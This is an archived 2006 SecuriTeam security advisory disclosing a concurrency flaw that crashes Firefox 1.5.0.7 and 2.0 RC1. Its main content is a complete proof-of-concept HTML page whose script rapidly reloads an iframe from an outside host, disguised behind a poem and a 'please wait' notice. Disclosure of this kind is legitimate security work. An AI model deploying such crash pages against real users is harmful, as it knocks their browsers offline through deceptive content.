[EXPL] Firefox Concurrency-Related Vulnerabilities
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 5 Oct 2006 15:38:35 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Firefox Concurrency-Related Vulnerabilities
------------------------------------------------------------------------
SUMMARY
A vulnerability in Firefox allows remote attackers to cause the browser to
crash by exploiting a concurrency issue in the way the browser
handlessimulations requests.
DETAILS
Vulnerable Systems:
* Firefox version 1.5.0.7
* Firefox version 2.0 RC1
Exploit:
<html>
<body bgcolor=black text=white onload="javascript:foo()">
<script>
<!--
counter = 0;
function foo() {
if (counter < 50) {
document.getElementById('foo').src =
"http://lcamtuf.coredump.cx/ffoxdie3_i.html?" +Math.random();
setTimeout('foo()',10 * counter);
counter++;
} else {
document.getElementById('foo').src =
"http://lcamtuf.coredump.cx/ffoxdie3_ok.html";
}
}
// -->
</script>
<img src="http://lcamtuf.coredump.cx/photo/current/ula4-6.jpg"
style="border-style: solid; border-width: 1px; border-color: #804040"
align=right>
<font face="tahoma, helvetica, arial">
<font color=lightblue>
Tyger, Tyger. burning bright<br>
In the forests of the night,<br>
What immortal hand or eye<br>
Could frame thy fearful symmetry?
</font>
<p>
<b>Please wait approx. 20 seconds...</b>
<br>
<iframe id=foo>
</iframe>
<p>
<font color=gray>
Javascript is required.<br>
Firefox is required.<br>
May fail on a spotty link.<br>
Common sense is advised.<br>
<p>
More photos: <a href=/photo/current/>click here</a>
</font>
</font>
</body>
</html>
ADDITIONAL INFORMATION
The information has been provided by <mailto:lcamtuf@xxxxxxxxxxxx> Michal
Zalewski.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] PHP open_basedir Race Condition Vulnerability
- Next by Date: [UNIX] Multiple Comdev Modules include.php Remote File Inclusion
- Previous by thread: [UNIX] PHP open_basedir Race Condition Vulnerability
- Next by thread: [UNIX] Multiple Comdev Modules include.php Remote File Inclusion
- Index(es):
Relevant Pages
|